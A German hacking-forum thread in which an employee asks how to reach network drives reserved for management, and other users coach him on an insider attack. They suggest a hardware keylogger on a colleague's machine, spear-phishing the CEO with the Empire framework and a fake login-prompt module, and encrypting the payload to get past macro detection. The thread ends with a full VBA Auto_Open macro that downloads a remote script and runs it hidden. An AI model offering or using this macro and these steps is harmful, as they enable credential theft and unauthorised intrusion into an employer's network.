Versteckte Netzwerk Laufwerke sichtbar machen?
Hi Leute
Ich bin als Mitarbeiter in einem Netzwerk eingebunden. D.h. der Zugang zum Server etc. besteht ständig.
Wie kann ich "gesperrte/versteckte" Laufwerke anzeigen lassen, welche auf andere Benutzer freigegeben worden sind?
Server - Clientstruktur:
Es gibt einen lokalen Server, der 2 virtuelle Server beinhaltet.
Der Login läuft über den Server - nicht über die lokalen Client-Rechner.
Serverzugang habe ich nur bei Installationen - aber mitlerweile macht dies praktisch nur noch der Informatiker. (praktisch unmöglich hier ohne Aufsicht etwas zu machen)
Auf z.B. \\srv01 sind mehrere virtuelle Laufwerke für die Client-PC's generiert worden. (z.B. I:/Apps, K:/Kundendaten etc.) jetzt weiss ich, dass noch einige solcher virtuellen Laufwerke vorhanden sind, da ich gesehen habe, dass die Geschäftsleitung 1-2 mehr angezeigt bekommt im Explorer.
Wie kann ich Zugriff auf diese versteckten/gesperrten Laufwerke erlangen? Müsste ich sein Login knacken oder gibt es eine Backdoor?
Besten Dank!
Gruss taker
AW: Versteckte Netzwerk Laufwerke sichtbar machen?
Um ein Backdoor bzw. ein Exploit im System zu finden müsste man die ganze Hardware- und Softwarearchitektur kennen und gestaltet sich per Glaskugel extrem schwierig.
Ich weiß zwar nicht wie gut euer Informatiker arbeitet aber wenn ich Dir eins an Herz legen darf, tu es besser nicht.
Gute Informatiker erkennen dieses vorhaben schon bevor du es richtig versucht hast. Meist kann der "Datenstrom" zurückverfolgt werden, sodass der Informatiker mit Leichtigkeit herausfinden kann, dass Du versucht hast mit deinem Rechner (IP ; MAC) mit anderen Logindaten und Passwort dich einloggen wolltest.
Und Exploits zu nutzen mit einem Firmenrechner schätze ich auch gegen Null, ohne das davon jemand etwas merkt.
Wenn Du es dennoch versuchen möchtest, wäre die einfachste Möglichkeit einen Hardware-Keylogger an den Rechner deines Opfers zu hängen und danach auszuwerten.
AW: Versteckte Netzwerk Laufwerke sichtbar machen?
Hi Alucart
Danke für Deine Antwort. Ja ich könnte den Keylogger schon einsetzen, habe solche Sachen auch früher angewendet. Aber ob es Sinn macht mit dem Antivirus etc. weiss ich nicht. Würde mich nur wunder nehmen, ob es eine "unauffällige" Möglichkeit diesbezüglich gibt.
Ist mit Linux was möglich evtl.?
AW: Versteckte Netzwerk Laufwerke sichtbar machen?
Hardware Keylogger werden nicht von Antiviren Programmen erkannt, da sie als Tastatur "erkannt" bzw angesehen wird.
AW: Versteckte Netzwerk Laufwerke sichtbar machen?
Zitat:
Zitat von
mtf-taker
Würde mich nur wunder nehmen, ob es eine "unauffällige" Möglichkeit diesbezüglich gibt.
Unauffällig genug?
Mit Linux ist es definitiv möglich. Wenn Kali-Linux genutzt wird, werden sogar Programme mitgeliefert die bekannte Exploits erkennen und nutzen.
Aber da ist die Frage wieder wie gut euer Informatiker arbeitet. Normalerweise dürfte es nicht so einfach möglich sein einen eigenen Rechner mit ans Firmennetz zu hängen (Portsecurity ect.)
AW: Versteckte Netzwerk Laufwerke sichtbar machen?
1. CEO Spear Phishen
2. Empire Framework benutzen
3. https://raw.githubusercontent.com/en...oginPrompt.ps1 Modul starten
4. Viel Spaß mit Passwort
5. ...
6. Profit!
//Edit:
Angriffe von innen finde ich immer spannend, vor allem wenn man meinen Punkt 1 betrachtet, gibt es viel mehr Möglichkeiten.
Du weist zB. mit wem er zusammenarbeitet, wer seine Assistenz ist, was gerade ein Hot Topic im Managementkreis ist.
Dadurch lässt sich eine Spearphishmail noch gezielter verfassen.
Check doch mal wie eure Clients auf Makroausführungen in Officedokumenten abgestimmt sind.
VG,
Braz
AW: Versteckte Netzwerk Laufwerke sichtbar machen?
ist Empire Framework nicht schon lange tot/detected? o.O
AW: Versteckte Netzwerk Laufwerke sichtbar machen?
Was sollte an einer Powershellverbindung detected werden?
Höchstens die generische Makro-Erkennung kann zu schaffen machen, was aber auch kein großer Act ist zu umgehen.
VG,
Braz
AW: Versteckte Netzwerk Laufwerke sichtbar machen?
Hi Braz. Danke Dir. Werde mir das mal ansehen. Kenne Empire Framework nicht.
Ich habe es so verstanden, dass ich in einem Word z.B. ein Makro einbaue, welches beim Start der Datei ausgeführt wird - bzw. Empire Framework oder direkt das entsprechende Modul gestartet wird. Folglich muss der Empfänger sich bei Win nochmals neu Anmelden/verifizieren und das wird dann mitgesnifft. Muss das mal zuhause ausprobieren. Wenn das Makro nun detected wird, was kann man dagegen machen? Du schreibst ja, es sei kein grosser Act dies zu umgehen?
Thanks!
AW: Versteckte Netzwerk Laufwerke sichtbar machen?
@Braz oops ich hab das grade mir veil-framework verwechselt :D
@mtf einfach den ganzen shit crypten und eine decrypt funktion in vba rein packen. Ich denke das sollte funktionieren.
AW: Versteckte Netzwerk Laufwerke sichtbar machen?
AH CRUZ ICH DREH DURCH!
Ich wollte gerade exakt das gleiche schreiben!
Den b64 Output nochmal mit AES verschlüsseln.
AES-Decrypt Funktion anfügen -> AES-Strings am Ende vom Makro entschlüsseln und gleich in die Shell übergeben.
//Edit:
Falls du aber gleich schwere Geschütze auffahren willst, nimm das Makro hier (selbstgebaut, getestet und für gut befunden):
Zitat:
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, _ ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub Auto_Open()
Dim InpUrl As String
Dim OutFilePath As String
Dim DownloadStatus As Long
InpUrl = "http://deinserver.net/1.vbs"
OutFilePath = "C:\Users\Public\1.vbs"
DownloadStatus = URLDownloadToFile(0, InpUrl, OutFilePath, 0, 0)
If DownloadStatus = 0 Then
Shell "wscript C:\Users\Public\1.vbs", vbHide
DownloadStatus = 1
Else
MsgBox "File nicht erreichbar #sadboy"
End If
End Sub
